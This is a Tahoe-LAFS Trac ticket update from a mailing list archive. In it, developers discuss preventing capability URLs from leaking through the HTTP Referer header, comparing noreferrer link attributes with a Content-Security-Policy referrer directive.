[tahoe-lafs-trac-stream] [tahoe-lafs] #127: Cap URLs leaked via HTTP Referer header
tahoe-lafs
trac at tahoe-lafs.org
Mon Oct 29 17:49:53 UTC 2012
#127: Cap URLs leaked via HTTP Referer header
-------------------------+-------------------------------------------------
Reporter: warner | Owner: davidsarah
Type: defect | Status: assigned
Priority: major | Milestone: 1.11.0
Component: code- | Version: 0.7.0
frontend-web | Keywords: confidentiality integrity
Resolution: | preservation capleak
Launchpad Bug: |
-------------------------+-------------------------------------------------
Comment (by davidsarah):
Replying to [comment:32 ChosenOne]:
> The noreferrer attribute on links could prevent leaking dircaps when
clicking the link to a potentially malicious html file on the WUI
> http://www.whatwg.org/specs/web-apps/current-work/multipage/links.html
#link-type-noreferrer
[attachment:restrict-referrer-leakage.txt] is a more complete and simpler
solution, as the spec says:
> The effect of this directive with an empty set of allowed referrer
recipients includes the effect of treating all links from the affected
documents as having the _noreferrer link type_ [HTML5]. However, this
directive:
> * applies to all requests, rather than only to requests made as a result
of following links defined by an HTML 'a' or 'area' element;
> * does not require rewriting links to have the noreferrer type;
> * enables the set of allowed referrer recipients to be controlled,
subject to any other user-agent-dependent restrictions as mentioned above;
> * is resistant to content injection attacks (at least in the case where
the Content-Security-Policy is specified by HTTP header).
(We don't need the third point but the other three are important, because
rewriting is hard.)
--
Ticket URL: <https://tahoe-lafs.org/trac/tahoe-lafs/ticket/127#comment:35>
tahoe-lafs <https://tahoe-lafs.org>
secure decentralized storage
More information about the tahoe-lafs-trac-stream
mailing list